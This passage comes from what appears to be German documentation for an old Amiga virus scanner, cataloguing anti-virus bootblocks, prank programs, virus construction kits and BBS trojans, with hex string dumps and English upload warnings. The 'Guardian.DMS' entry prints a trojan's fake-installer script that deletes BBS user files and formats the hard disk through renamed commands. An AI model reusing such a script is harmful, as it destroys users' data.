  8507.                   erkennt einige alte BBViren ( Alertmeldung )
  8508.                   beim ersten Bootblockschreiberfolg wird noch der
  8509.                   DoIo-Vector verbogen und bleibt verbogen
  8510.                   bei leerem Laufwerk blinkt PowerLed
  8511.  
  8512.       - JoshuaKill.BB        Cool, DoIo
  8513.          KS3.0: ja
  8514.          a)fordert trackdisk.device NICHT
  8515.          b)belegt bei Bedarf OHNE Check Speicher ab $7FF00
  8516.             - Empfehlung deshalb: Loeschen
  8517.          Aufgaben:
  8518.             Testet Vektoren und sucht mit DoIo im BB nach Joshua.
  8519.             Mit DisplayAlert wird bei Bedarf ein Text ausgegeben.
  8520.             Joshua.BB wird ueberschrieben.
  8521.          Im BB ist u.a. zu lesen:
  8522.            THIS BOOTBLOCK IS NO VIRUS! IT KILLS JOSHUA VIRUS I+II!
  8523.  
  8524.       - Outlaw-VirusChecker
  8525.          keine Vermehrung, erkennt SCA. Schreibt aber immer KS1.2 Werte
  8526.          (z.B. Vec5 $fc12fc) zurueck. Folge: GURU mit KS1.3
  8527.          nicht resident
  8528.          Empfehlung: loeschen
  8529.  
  8530.       - M&U  V5.5 u. V6.1   KickTag, KickCheckSum immer $7F400
  8531.          nach Reset auch DoIo, prueft die Standard-Vektoren und
  8532.          springt bei der Erstinstallation, falls diese nicht 0 sind,
  8533.          ins ROM zum Reset.
  8534.          Fehler: or.l $550(a6),d0  (richtig:$226)
  8535.          Stand: Feb. u. Maerz 90
  8536.          Empfehlung deshalb: sofort loeschen
  8537.  
  8538.       - MemClear.BB        Cool $7F0AE
  8539.          Keine Vermehrung, KS2.06: ja  Empfehlung: Loeschen
  8540.          Setzt Reset-Vektoren auf Null und verbiegt dann Cool wieder
  8541.          Namensbegruendung: im BB uncodiert zu lesen
  8542.            203e204d 656d6f72 79436c65 6172426f  > MemoryClearBo
  8543.            6f745631 2e323520                   otV1.25
  8544.  
  8545.       - Monkey-Killer   AssProt-Clone  Empfehlung loeschen  s.o.
  8546.          Endlich hat es jemand geschafft den Text abzuaendern. Leider
  8547.          erkennt VT diesen BB weiterhin als ASS-Prot.BB .
  8548.  
  8549.  
  8550.       - N-STAR-Killer  BB   Empfehlung loeschen
  8551.             Testet Cool und KickTag auf 0
  8552.             Falls ja   blauer Hintergrund und weiter
  8553.             Falls nein ROM-Reset $FC0004
  8554.             Keine verbogenen Vektoren
  8555.             Keine Vermehrungsroutine
  8556.             Datenschrott (falls vorhanden) hinter dem Text wird NIE
  8557.             erreicht.
  8558.             Version V1.7:
  8559.            79002020 20202020 56312e37 20202020 y.      V1.7
  8560.            20205649 5255534b 494c4c45 52204652   VIRUSKILLER FR
  8561.            4f4d2a2a 204e4f52 54482053 54415220 OM** NORTH STAR
  8562.             Version V2.0:
  8563.            61727900 20202020 20205632 2e302020 ary.      V2.0
  8564.            20202020 56495255 534b494c 4c455220     VIRUSKILLER
  8565.            46524f4d 2a2a204e 4f525448 20535441 FROM** NORTH STA
  8566.            52202a2a 20202057 72697474 656e2062 R **   Written b
  8567.  
  8568.  
  8569.       - NO BANDIT  soll ByteBandit am Bootblockbefall hindern
  8570.          Text:  NO BANDIT ANYMORE!  R.T.
  8571.          Empfehlung: loeschen
  8572.  
  8573.       - PayDay.BB   Als AntiVirusBB gebaut           Starfire2-Clone
  8574.          Dringende Empfehlung: Loeschen, da voellig veraltet.
  8575.          Namensbegruendung:
  8576.          Im BB ist zu lesen: PayDay !!!
  8577.          Cool $7EC0E, im Prg DoIo $7ECF0, im Speicher immer ab $7EC00
  8578.          KS2.04: Guru 4 nach Reset
  8579.          Fordert trackdisk.device NICHT
  8580.          Ablauf:
  8581.          Testet auf DOS0-Kennung
  8582.          Testet jeweils 1 Langwort, z.B Band, fuer verschiedene BB-Viren.
  8583.          Falls eines gefunden wird, wird mit DisplayAlert ein Text aus-
  8584.          gegeben und das Schreiben des Payday-BBs angeboten.
  8585.          Ich rate dringend davon ab, da Probleme mit KS2.04 ent-
  8586.          stehen und nicht einmal 10 BB erkannt werden.
  8587.  
  8588.       - RedGhost-AV (L)   Bootblock
  8589.          Verbogene Vektoren: KickTag und im Prg. DoIo
  8590.          Im Speicher immer ab $FF600
  8591.          Soll ein AntivirusBB sein, ABER !!!
  8592.           - Fordert trackdisk.device NICHT
  8593.          DRINGENDE Empfehlung  SOFORT Loeschen
  8594.          Im BB ist uncodiert zu lesen:
  8595.            696f6e2e 6c696272 61727900 52656447 ion.library.RedG
  8596.            686f7374 00556e6b 6e6f7700 4e6f7445 host.Unknow.NotE
  8597.            78650056 69727573 0050726f 74656374 xe.Virus.Protect
  8598.  
  8599.  
  8600.       - Sherlock     AntiVirenBB , Cool, DoIo, resident im Speicher,
  8601.          im Speicher immer ab 7FA00, benutzt zusaetzlich 7CA00,
  8602.          Textausgabe mit DisplayAlert
  8603.          schreibt bei mehr als 512KB  BeginIo an falsche Stelle,
  8604.          Empfehlung: loeschen
  8605.          Hinweis: 04.03.92 (Brief)
  8606.             soll Disks zerstoeren. Getestet: nicht aufgetreten
  8607.  
  8608.  
  8609.       - SystemZ V3.0, 4.0, 4.1, 5.0, 5.1, 5.3, 5.4, 6.1, 6.3, 6.4, 6.5
  8610.          KickTag, KickCheckSum, loescht Cool, im Prg. DoIo
  8611.          Melodie und Farbbalken
  8612.          ab 6.3 keine speicherabsolute Adresse mehr
  8613.          neuer Name Virusprotector (meldet sich vor Schreibzugriff)
  8614.                z.B. :
  8615.             20535953 54454D20 5A205649 52555320  SYSTEM Z VIRUS
  8616.             2050524F 54454354 4F522056 342E3020  PROTECTOR V4.0
  8617.  
  8618.       - Trackers Antivirus V1.2
  8619.          blauer Streifen, helle Schrift
  8620.          2 alte absolute ROM-Einspruenge
  8621.          Empfehlung deshalb: sofort loeschen
  8622.  
  8623.       - TRACKERS-AV.BB (H) V3.0 harmlos
  8624.          roter Streifen, helle Schrift
  8625.          Testet Cool, Cold, KickTag also ein AntiVirus.BB
  8626.          KS 3.1 ja  68040 ja
  8627.          Bei Bedarf wird Loeschen oder Weiter mit Maustasten angeboten.
  8628.          Im BB ist zu lesen:    
  8629.           20544845 20545241 434b4552 532d414e  THE TRACKERS-AN
  8630.           54495649 52555320 56332e30 2021202d TIVIRUS V3.0 ! -
  8631.  
  8632.       - VERA      File
  8633.          Filelaenge: #2472 Bytes
  8634.          Ein AntiVirusProgramm und KEIN (!!!!) Virus
  8635.          Verbogene Vektoren: Cold, BeginIo, Int5
  8636.          Resetfest: ja
  8637.          Hat Probleme mit Cache:
  8638.          Im File ist zu lesen:
  8639.             42814eae ff704e75 6000004c 20544845 B.N..pNu`..L THE
  8640.             20564952 55532045 5241534f 52205632  VIRUS ERASOR V2
  8641.             2e332028 56455241 29202d20 57524954 .3 (VERA) - WRIT
  8642.             54454e20 42592042 4f444f20 53544945 TEN BY BODO STIE
  8643.             474d414e 4e203139 38382000 00000000 GMANN 1988 .....
  8644.          Es sollen Veraenderungen im Speicher erkannt werden und
  8645.          BB-Schreibzugriffe abgefangen werden. Das Programm macht
  8646.          NICHTS !!!! selbst, sondern oeffnet verschiedene Requester
  8647.          und ueberlaesst dem Anwender die Entscheidung. Da das
  8648.          Programm sehr alt (1988) ist, ist es natuerlich 1997 nicht
  8649.          mehr brauchbar. Sie sollten es nicht mehr verwenden.
  8650.          VT sollte das Teil im Speicher erkennen.
  8651.  
  8652.       - Vir.Prot.PB.BB (L)
  8653.          Dringende Empfehlung: Sofort Loeschen
  8654.          Soll Viren erkennen. Veraltet
  8655.          Verbogene Vektoren: Cold Cool DoIo
  8656.          68030: Nach Reset GURU
  8657.          Im BB ist nur zu lesen:
  8658.            62726172 79002050 6f776572 426f6f74 brary. PowerBoot
  8659.          Kann sich selbst als BB schreiben !!!!
  8660.          Fordert trackdisk.device nicht !!!
  8661.          Keine Unterscheidung Filesystem !!!!
  8662.  
  8663.       - VIRUS HUNTER  Kicktag $7F300, KickCheckSum $7F307 immer ab $7F300
  8664.          war ein AntiVirusBB fuer KS1.2  Empfehlung heute: sofort loeschen
  8665.          Begruendung:
  8666.             direkte RomEinspruenge
  8667.             jsr $FC06DC, $94(a6)=$FC12FC, schreibt nach $238(a6) dieser
  8668.             Teil wird aber seit KS2.04 genutzt !!!   usw.
  8669.  
  8670.       - Virus-Killer
  8671.             KickMem, KickTag, KickCheckSum
  8672.  
  8673.       - VIRUS SLAYER V1.0     Cool, DoIo, im Speicher immer $7FA00
  8674.          nur KS1.2 da DoIo absolut ROM
  8675.          veraltet, Empfehlung: loeschen
  8676.          Vermehrung: ueber BB
  8677.          Clone 21.01.94: Erzeugt mit TAI10-Inst. (s.o.)
  8678.          Nur ASCII-Text geloescht.
  8679.          Wird weiterhin als VirusSlayer erkannt:
  8680.            2e202e2e 2e202e20 2e2e2e2d 202e2e20 . ... . ...- ..
  8681.            2e2d2e20 2e2e2d20 2e2e2e21 2e2e2e20 .-. ..- ...!...
  8682.            2e2d2d2e 202e2e2e 2e202e2e 202d2e20 .--. .... .. -.
  8683.  
  8684.       - XCOPY2-BB   Empfehlung: Loeschen
  8685.          KS2.04 ja
  8686.          Fordert trackdisk.device NICHT
  8687.          KickTag, KickCheckSum, im Prg. DoIo, Speicherlage mit
  8688.          AllocMem
  8689.          Ablauf:
  8690.          Beim naechsten Reset wird der Bildschirm gruen.
  8691.          NUR wenn Sie beim Bootvorgang BEIDE Maustasten druecken,
  8692.          wird ein normaler BB geschrieben.
  8693.          Fuer mich ist das KEIN Virus, da OHNE das Wollen des Be-
  8694.          nutzers NICHTS passiert und nicht jeder die Tasten-
  8695.          kombination kennt.
  8696.          Namensbegruendung:
  8697.          Am Ende von Block 0  ist XCOPY2 zu lesen. Der Block 1 wird
  8698.          vom BB-Prg nicht benoetigt und mit 0 aufgefuellt.
  8699.  
  8700.       - ZVirusKiller V1.5  BB   KickTag, KickCheckSum, veraltet
  8701.          Empfehlung: loeschen
  8702.          Text: ZViruskiller V 1.5 usw.
  8703.  
  8704.  
  8705.    - harmlose Programme:    ????????
  8706.      ===================
  8707.  
  8708.       - ANTI-Disk-Validator  Laenge: 1848 Bytes
  8709.          in einen Disk-Validator von WB1.3 wurde das Wort ANTI ein-
  8710.          gebaut. Ueber diesen String wird mit bra.s hinweggesprungen.
  8711.          Die zusaetzlichen 8 Bytes werden wieder eingespart durch die
  8712.          Umwandlung von zwei Longs in Short im weiteren Programm.
  8713.          Dieses Programm ist harmlos. Um aber das Durcheinander bei
  8714.          den Disk-Validatoren gering zu halten, empfehle ich:
  8715.             LOESCHEN !!!!!
  8716.          Nachtrag Feb 94: Es ist ein Programm aufgetaucht, das so einen
  8717.           Anti-Disk-Validator schreibt (fragt aber erst nach). Da als
  8718.           Versionsnummer 1.7 angegeben wird, vermute ich, dass dieses
  8719.           Programm schon laenger existiert.
  8720.           Name: Bush    Laenge gepackt:  7696 Bytes
  8721.                       Laenge ungepackt: 13344 Bytes
  8722.           Dieses Programm wird in der Beschreibung als SADDAM-Killer
  8723.           vorgestellt.
  8724.  
  8725.       - PowerUp  ein GagPrg.  Laenge: 800 Bytes      KEIN Virus !!!!!!
  8726.          keine verbogenen Vektoren. Kein Schreibzugriff
  8727.          Empfehlung: loeschen
  8728.          Ablauf:
  8729.          - nach dem Start wird ein PrgTeil decodiert mit eori.b #$AB,(a0)+
  8730.          - in der shell erfolgt die Ausgabe:
  8731.                  PowerUp ist installiert. Viel Spaß!!!
  8732.          - promptzeichen kommt NICHT
  8733.          - 1. Zeitschleife (dosDelay) laeuft an.
  8734.          - Ausgabe ueber AutoRequest
  8735.                  Achtung!
  8736.                  PowerUp wurde entfernt, da der
  8737.                  Rechner zu heiß wurde.
  8738.                  Neue Installation erst nach Abkühlung der
  8739.                  Logik-Chips möglich!
  8740.                   Oh, schade                  Oh, schade
  8741.          - Nach Mausklick immer noch kein prompt
  8742.          - 2. Zeitschleife laeuft an
  8743.          - DisplayAlert
  8744.                     A P R I L , A P R I L !!!
  8745.          - Nach Mausklick erscheint Prompt-Zeichen
  8746.  
  8747.    - schaedliche Programme:
  8748.      ======================
  8749.  
  8750.       - AcidInfector v1.5   File
  8751.          Loeschen           Laenge gepackt:   1076 Bytes
  8752.                             Laenge ungepackt: 1384 Bytes
  8753.          Fordert zur Installierung von BB-Viren auf.
  8754.            68652041 6369642d 496e6665 63746f72 he Acid-Infector
  8755.            20762031 2e350a0a 0d496e73 65727420  v 1.5...Insert
  8756.            6469736b 20746f20 62652069 6e666563 disk to be infec
  8757.            7465642c 20616e64 20707265 73732052 ted, and press R
  8758.            65747572 6e3a0a0d 4572726f 72202d76 eturn:..Error -v
  8759.            69727573 6e616d65 20646f65 73206e6f irusname does no
  8760.          Hinweis: Erkennung in gepackter Form NICHT sicher (??). Testen
  8761.          Sie bitte das File, bevor Sie es loeschen.
  8762.  
  8763.       - AmiExpress 3.20 Fake    (17.01.94)
  8764.          Wird von VT NICHT erkannt !!!!!
  8765.          Soll mehrere Backdoors enthalten (Fremdaussage NICHT nachge-
  8766.          prueft !!! ). Fuer Nicht-Mailboxbetreiber ungefaehrlich. Und
  8767.          fuer die Mailboxbetreiber auch nur falls sie die Raubkopie
  8768.          installieren !!!
  8769.          Filename:  ACP        45612 Bytes
  8770.                     acp.info    1182 Bytes
  8771.                     Express   212356 Bytes
  8772.  
  8773.       - BootblockMassacre    gepackt: 9592     
  8774.             20202020 20202070 72657365 6e742069        present i
  8775.             6e203139 3838203a 201b5b31 6d544845 n 1988 : .[1mTHE
  8776.             20424f4f 54424c4f 434b204d 41535341  BOOTBLOCK MASSA
  8777.             43524520 1b5b306d 0a202020 20202020 CRE .[0m.......
  8778.          Bietet install von verschiedenen alten BB-Viren   (1988)
  8779.          Bietet install von TimeBomb V0.9 (Files) s.o.
  8780.  
  8781.       - BootShop         Defjam:    108008
  8782.                          MasterCr:   67892
  8783.                          TetraPack:  74036
  8784.          Dringende Empfehlung: Loeschen
  8785.          Erlaubt das Installieren von ueber 40 BB-Viren
  8786.          Hinweis: Erkennung in gepackter Form NICHT sicher (??). Testen
  8787.          Sie bitte das File, bevor Sie es loeschen.
  8788.  
  8789.       - BootShop.unp?   Loeschen
  8790.          Jemand hat sich die Muehe gemacht und das BootShop-Prg ent-
  8791.          packt. Da absolut an eine Speicherstelle entpackt wird, ent-
  8792.          steht ein DATA-File, das NICHT zu starten ist !!! Sie sehen
  8793.          weder $3F3 noch $3E9 .
  8794.          Also kann dadurch KEIN BB verseucht werden.
  8795.          Sie erkennen eine Anzahl von Viren-BBen.
  8796.          Loeschen Sie das File.
  8797.  
  8798.  
  8799.       - BootX5.02   gibt es noch gar nicht (Stand:26.06.92)
  8800.          Jemand mit Filemonitorkenntnis hat mehrmals das Wort Porky
  8801.          eingebaut. Sofort loeschen
  8802.  
  8803.       - ByteWarriorCreater   gepackt: 6012 Bytes  (TNM)
  8804.                            ungepackt: 7360 Bytes
  8805.          Erzeugt mit Fastmem eine NDOS-Disk
  8806.          Ohne Fastmem wird der ByteWarrior in den Bootblock geschrieben
  8807.  
  8808.       - DAG_Creator     ungepackt: 7000 Bytes oder 7360 Bytes
  8809.             anderer Name: Infector V2.0    gepackt:4956
  8810.             schreibt DAG-Virus in BB von df1:
  8811.          VT sollte die Version mit Laenge 7360 Bytes ungepackt erken-
  8812.          nen.
  8813.  
  8814.       - Disk.info   Laenge: 370 Bytes  KEINE Vermehrung
  8815.          Ein OriginalWB1.3-Icon wurde in der Struktur geaendert. (Text
  8816.          eingebaut z.B. This is a little present for all Lamers
  8817.          abroad ). Sobald Sie diese Disk einlegen und es muesste das
  8818.          Disk-Icon auf der WB angezeigt werden, stuerzt der Rechner
  8819.          ab. Haben Sie die Startup-Sequence im Cli abgebrochen, so
  8820.          muss kein Icon dargestellt werden und deshalb koennen Sie
  8821.          mit dieser Disk ohne Probleme arbeiten. Abhilfe: Ersetzen
  8822.          Sie Disk.info .
  8823.  
  8824.       - DiskRepair V2.6     Laenge:37740
  8825.          Schreibt nach dem ersten Scandurchgang einen LEEREN RootBlock
  8826.          mit Namen PHOENIX . Beim 2. Durchgang werden aber dann die
  8827.          Files wieder eingetragen.  ABER  !!!!!
  8828.          es wird immer ein nicht ausfuehrbarer BootBlock geschrieben ???
  8829.          Der Fehler liegt nach meiner Meinung im File bei $80d0 . Ich
  8830.          rate also von diesem Prg. ab !!!
  8831.  
  8832.       - DM-Trash     06.08.92      s.o. ZAPA_B.Door
  8833.              gegen AmiExpress ???
  8834.          dm-tr.lha 5135 Bytes  entpackt: dm-trash 4764 Bytes
  8835.          folgender Text (doc) ist enthalten:
  8836.          New virus ...caused by the new FIXED (?) Version
  8837.          of DMS 1.11 Turbo!
  8838.          It is some kind of linkvirus and uses Devices
  8839.          like DH0:, LIBS:, and BBS: (!!) usw.
  8840.  
  8841.          Eigene Versuche mit FangFiles (habe AmiExpress nicht) haben
  8842.          ergeben, dass eben von dm-trash folgende Files veraendert wer-
  8843.          den:  bbs:config1  bbs:user.data  bbs:user.key 
  8844.          Die Files wurden verlaengert.
  8845.          dm-trash. Vermutlich soll ein Superlevel fuer einen Boxzu-
  8846.          gang geschaffen werden. Also fuer normale Amiga-User kein
  8847.          Problem.
  8848.  
  8849.       - Guardian.DMS  sofort loeschen
  8850.          Nach dem Entpacken auf Disk entsteht guardian.config,
  8851.          startup-sequence und andere Files.
  8852.          Gefaehrlich:
  8853.  
  8854.          guardian.config
  8855.          v1.0 dh0:bbs/
  8856.          v1.0 dh1:bbs/
  8857.          2
  8858.             - v1.0 ist in c auf der Disk ein umbenannter delete-Befehl
  8859.  
  8860.          startup-sequence
  8861.          echo " "
  8862.          echo "      GUARDIAN MULTITOOL INSTALL      "
  8863.          echo " "
  8864.          echo "Please wait"
  8865.          v1.0 dh0:bbs/user.data
  8866.          v1.0 dh0:bbs/user.keys
  8867.          v1.0 dh0:bbs/config1
  8868.          v1.0 dh0:s/startup-sequence
  8869.          check drive dh0: Name Guardian-Multi
  8870.          wait 3
  8871.          echo " "
  8872.          echo "Operation complete "
  8873.             - check ist in c auf der Disk ein umbenannter format-Befehl
  8874.  
  8875.       - Infect     Laenge ungepackt: 1384
  8876.          schreibt File (z.B. BB) in BB eines LW's DFx
  8877.          kann sowohl positiv als auch negativ genutzt werden
  8878.  
  8879.       - Infector V2.0   = DAG_Creator  s.o.
  8880.  
  8881.       - Keeper V2.0   gepackt: 34272 Bytes
  8882.          Hat einige Viren zum installieren FEST eingebaut.
  8883.  
  8884.       - Lhwarp_V1.40   Laenge: 47880 Bytes (ungepackt)
  8885.                Hinweis eines Users: mit Impl: 24788, mit PP: 27828
  8886.          Schreibt bei mir auf Zieldisk, falsche DiskStruktur beim Entpacken.
  8887.          Disk dann unbrauchbar. Bitte fuehren Sie aber mit unwichtigen
  8888.          Disks selbst Tests durch und testen Sie mit BlockKette.
  8889.  
  8890.       - LZ 2.0             Hinweis: Stand 21.09.91
  8891.          In Boxen ist ein LZ2.0 aufgetaucht, mit Laenge 37380 Bytes
  8892.          entpackt. Muss sich um einen Patch handeln und soll Archive
  8893.          zerstoeren. Hab ich, wird aber von VT nicht erkannt.
  8894.          Die hoechste OriginalVersionsNummer von LZ war am 22.09.91
  8895.          LZ 1.92 .
  8896.  
  8897.       - Show Sysops Util  06.08.92
  8898.          Laenge: 5780   entpackt: 7860
  8899.          Sucht nach BBS:USER.DATA und gibt Daten am Bildschirm aus.
  8900.          An einem FangFile konnten keine Veraenderungen festge-
  8901.          stellt werden. Dies kann aber bei einem Mailboxprg. anders
  8902.          sein. Fuer normale Amiga User nach meiner Meinung keine
  8903.          Gefahr und Sysops wissen sich zu helfen oder ??
  8904.  
  8905.       - uinfo        Laenge:13048   wird von VT  NICHT  erkannt
  8906.          Sucht nach AEDoorPort (AmiExpress ???) und Userdaten.
  8907.          Also fuer NormalUser ohne MailBox keine Gefahr.
  8908.          10.09.92
  8909.  
  8910.       - Virusconstructionset       Laenge gepackt (PP2): 10192 Bytes
  8911.          Sie werden aufgefordert, einen max 60 Zeichen langen Display-
  8912.          Alert-Text einzugeben. Den erzeugten BB koennen Sie dann auf
  8913.          Disk in DF0: abspeichern. 
  8914.          Hinweis: Erkennung in gepackter Form NICHT sicher (??). Testen
  8915.          Sie bitte das File, bevor Sie es loeschen.
  8916.  
  8917.       - VirusConstructionSet 2       Laenge gepackt (PP3): 32360 Bytes
  8918.                                             entpackt     : 47944 Bytes
  8919.          Sie werden aufgefordert, einen max 60 Zeichen langen Display-
  8920.          Alert-Text einzugeben. Weitehin koennen Sie den Virusnamen
  8921.          festlegen, der dann immer im BB sichtbar ist. Mit F1 oder F2
  8922.          legen Sie fest, ob der BB codiert abgespeichert wird.
  8923.          Hinweis: Erkennung in gepackter Form NICHT sicher (??). Testen
  8924.          Sie bitte das File, bevor Sie es loeschen.
  8925.  
  8926.       - Virusmaker V1.0              Laenge gepackt (PP): 15641 Bytes
  8927.                                             entpackt    : 84216 Bytes
  8928.          erzeugt nach Wahl: Byte Bandit, Byte Warrior, S.C.A., North-
  8929.          Star 1+2, System Z
  8930.          Dringende Empfehlung: Loeschen
  8931.          Hinweis: Erkennung in gepackter Form NICHT sicher (??). Testen
  8932.          Sie bitte das File, bevor Sie es loeschen.
  8933.  
  8934.       - X-Ripper V1.1     Laenge: 41360 Bytes (ungepackt)
  8935.          erlaubt mit inst 5 das Schreiben eines Lamer-BBs. Es wird
  8936.          aber eine NDos-Disk daraus, weil die DOS0-Kennung um 8 Bytes
  8937.          verschoben angelegt wird.
  8938.          Hinweis: Erkennung in gepackter Form NICHT sicher (??). Testen
  8939.          Sie bitte das File, bevor Sie es loeschen.
  8940.  
  8941.       Programme gegen BBS, die ich nicht besitze. Bitte zusenden. Danke
  8942.  
  8943. /      ---> Date And Time Uploaded -- Mon 01-Feb-93  2:34:10 PM <---        \
  8944. -----------------------------------------------------------------------------
  8945.  WARNING ! DO NEVER RUN THE FILE "KILLKIM.EXE" ON YOUR BBS COMPUTER !!!
  8946. IT LOOKS FOR THE USER.DATA,USER.KEYS, STARTUP-SEQUENCE & EXPRESS MAINFILE
  8947. AND FILLS THEM WITH THE FOLLOWING TEXT:
  8948.  
  8949. --------------CUT HERE------------------
  8950. STARTUP-SEQUENCE SUCCESSFUL DESTROYED!!! 
  8951. --------------CUT HERE------------------
  8952.  
  8953.  
  8954. --------------CUT HERE-----------------
  8955. USER.KEYS SUCCESSFUL DESTROYED !!! 
  8956. --------------CUT HERE-----------------
  8957.  
  8958.  
  8959. AND SO ON. THEN IT RUNS AN APPENDED LSD INTRO. 
  8960. TO THE LAMER WHO 'CODED'[IT WAS COMPILED AREXX] THAT STUFF:LOOKS PRETTY LAME
  8961. IF THERE'S A REQUESTER ON SCREEN "PLEASE INSERT VOLUME BBS: IN ANY DRIVE"...
  8962. I WOULD AT LEAST CHECK IF BBS: ACTUALLY EXISTS ! 
  8963.                                                       CYCLONE/DUAL CREW
  8964.  
  8965.  
  8966. /      ---> Date And Time Uploaded -- Sun 31-Jan-93  1:31:54 PM <---        \
  8967. -----------------------------------------------------------------------------
  8968.  -------------------------------------------------------------------------
  8969.    WARNING ! WARNING ! WARNING ! WARNING ! WARNING ! WARNING ! WARNING !
  8970.  -------------------------------------------------------------------------
  8971.   THE FILES JISMTRO.EXE IS A TROJAN ! IT CREATES A FILE IN AREA 2 UPLOAD
  8972.             DIR WITH THE NAME TSL-BBS.EXE !!!! DO NOT RUN IT !
  8973.  -------------------------------------------------------------------------
  8974.  
  8975. Maerz 93:
  8976.  
  8977. WARNiNG!
  8978.  
  8979. A File Named 'TRSITW.EXE' Was Spread Some Days Ago, Labeled As A
  8980. New TRSI Intro  - This Is A Damn FAKE! And Even Worse It Has A
  8981. BackDoor In It Which Tries To Open The File 'DH0:BBS/USER.DATA' !
  8982. After That It Looks For A User Called 'EASY-E' And Sets (If Existing)
  8983. His UserLevel To 255 !
  8984.  
  8985. Whoever This Little Creep May Be : Give Him A Kick If Ya' Know Him !
  8986.  
  8987.   ------------------------------------------------------------------------
  8988.  
  8989. April 93:
  8990.  
  8991.  Es ist ein Gfa-Basic-Programm aufgetaucht, das angeblich verschiedene
  8992.  Link-Viren erzeugt.
  8993.    VCS         Laenge PP-crunched: 30276
  8994.    VCS.info    Laenge: 459
  8995.    VCS.data    Laenge: 23632
  8996.    VCS1.data   Laenge: 12536
  8997.  
  8998.  Nach IHRER muehevollen, aber leider vergeblichen Arbeit, wird auf der
  8999.  Disk in df0 ein File mit Namen Tasten-Text erzeugt.
  9000.  
  9001.         Hallo Virustown !
  9002.                          
  9003.         Es ist Sommerzeit und der 1.April 
  9004.  
  9005.  
  9006.        Aber vielleicht ist ja doch ein Virus da ?
  9007.               SCHAU DOCH MAL IN DER UHR NACH ?!!?
  9008.                                                  
  9009.               Hier  ne Tastenkombination:
  9010.               linke Hand: alt,ctrl,q,4,v
  9011.               rechte Hand: Enter,8,Alt,Help,ü
  9012.               Nase: F6
  9013.               Zunge: z
  9014.  
  9015.  Ich finde den "GAG" nicht so stark und denke die erste geloeschte
  9016.  Festplatte, laesst diesen Programmierer mit seiner SINNLOSEN Arbeit,
  9017.  anders denken.
  9018.  
  9019.  --------------------------------------------------------------------------
  9020.  
  9021.    Heiner
  9022.  
  9023.   Amiga ist ein eingetragenes Warenzeichen von Gateway 2000
  9024.  
  9025.